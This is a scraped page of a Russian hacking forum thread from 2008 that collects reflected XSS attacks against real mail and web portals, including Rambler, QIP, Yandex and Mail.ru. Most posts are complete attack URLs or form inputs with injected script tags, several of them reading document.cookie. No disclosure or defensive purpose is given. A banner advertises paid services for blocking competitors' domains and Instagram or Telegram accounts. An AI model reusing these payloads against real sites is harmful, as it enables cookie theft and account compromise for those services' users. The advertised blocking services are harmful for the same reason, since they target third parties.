Форум АНТИЧАТ - Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Пассивные xss на почтовых серверах

Страница 1 из 15

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

Пассивные xss на почтовых серверах

25.10.2008, 15:54

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Пассивные xss на почтовых серверах

Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

Оффтоп наказуем

p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

26.10.2008, 11:32

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

Провел на форуме:
792994

Репутация: 104

rambler.ru

http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E

26.10.2008, 21:55

~~cash$$$~~

Banned

Регистрация: 06.01.2008

Сообщений: 413

Провел на форуме:
1301036

Репутация: 1334

Отправить сообщение для cash$$$ с помощью ICQ

http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

Во всех полях вставляем "><script>alert('xss')</script>

http://goon.ru/i/phone/rus_moscow.htm

В поле Поиск по фамилии "><script>alert('xss')</script>

http://catalog.aport.ru/rus/add/AddUrl.aspx

В Адрес ресурса вставляем "><script>alert('xss')</script>

27.10.2008, 06:26

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

Провел на форуме:
792994

Репутация: 104

Ramber.ru

http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>aler t(/TreV@N/)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert( 'TreV@N')</script>&form=0&hu=1&what=0

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&wha t=0"><script>alert('TreV@N')</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script >alert('TreV@N')</script>&hu=1&what=0

15.11.2008, 22:41

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

Провел на форуме:
1686744

Репутация: 246

Отправить сообщение для S0ulVortex с помощью ICQ

Решил выложить XSS найденную лично мной

Код:

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

20.11.2008, 00:23

foopi

Познающий

Регистрация: 26.10.2008

Сообщений: 50

Провел на форуме:
536527

Репутация: 62

Отправить сообщение для foopi с помощью ICQ

пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E

20.11.2008, 01:22

.dimoN.

Участник форума

Регистрация: 08.04.2008

Сообщений: 150

Провел на форуме:
3980762

Репутация: 136

Цитата:

Сообщение от S0ulVortex

Решил выложить XSS найденную лично мной

Код:

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

по твоему же примеру

Код:

http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E

22.11.2008, 02:28

~~cash$$$~~

Banned

Регистрация: 06.01.2008

Сообщений: 413

Провел на форуме:
1301036

Репутация: 1334

http://inbox.uz/
'><script>alert(/xss/)</script>
Уязвимые поля Логин и пароль.

23.11.2008, 20:45

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script>
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

Последний раз редактировалось Ded MustD!e; 23.11.2008 в 21:03..

#10

25.11.2008, 16:57

Luccifer

Познающий

Регистрация: 05.12.2006

Сообщений: 63

Провел на форуме:
1269724

Репутация: 100

Отправить сообщение для Luccifer с помощью ICQ

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer') </script>

http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
в поле URL Вашей страницы:
Код:
"><script>alert(document.cookie)</script

Последний раз редактировалось Luccifer; 25.11.2008 в 17:03..

Страница 1 из 15

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Сценарии/CMF/СMS	7	04.02.2010 02:55
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход